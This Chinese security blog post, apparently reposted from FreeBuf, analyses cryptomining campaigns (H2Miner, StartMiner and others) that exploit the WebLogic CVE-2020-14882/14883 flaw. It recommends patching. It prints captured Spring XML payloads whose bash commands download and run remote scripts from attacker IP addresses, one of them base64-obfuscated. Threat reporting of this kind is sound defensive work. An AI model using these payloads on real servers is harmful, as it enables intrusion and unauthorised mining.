近期Weblogic未授权命令执行漏洞(CVE-2020-1488214883)漏洞利用的挖矿活动 – 作者:ArseneLupin

背景

近期Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)的EXP的面世,使得个挖矿团伙迅速展开了各种基于该漏洞的攻击活动。

详情

漏洞EXP复现

漏洞具体EXP复现可参考下面文章,主要有两种方式。其中第二种方式又多个团伙的样本。

https://blog.csdn.net/weixin_41598660/article/details/109409965

1.H2Miner

其中payload 如下所示:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/bash</value>
        <value>-c</value>
        <value><![CDATA[(curl -s 95.142.39.135/wb.sh||wget -q -O- 95.142.39.135/wb.sh)|bash]]></value>
      </list>
    </constructor-arg>
  </bean>
</beans>

详细分析可查看(https://mp.weixin.qq.com/s/JPm71AI-CeeRmoZwEl34bg

2.StartMiner

其payload文件(http://205.185.116.78/poc.xml)如下所示:

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
	<value>/bin/bash</value>
	<value>-c</value>
	<value>curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms</value>
      </list>
    </constructor-arg>
  </bean>
</beans>

3.z0Miner

详情见https://s.tencent.com/research/report/1170.html, paylaod 样本链接(http://189.7.105.47:8181/examples/jsp/z0.txt)已经无法下载

4.MSASCMiner

详情见MSASCMiner

总结

目前,随着漏洞EXP的更新,随即小黑们也会及时的更新最近的攻击手段,大家及时检查weblogic版本,打好补丁。

受影响的版本

10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

漏洞修复

此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

注:Oracle官方补丁需要用户持有正版软件的许可账号,使用该账号登陆https://support.oracle.com后,可以下载最新补丁。

来源:freebuf.com 2020-11-12 16:35:20 by: ArseneLupin

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论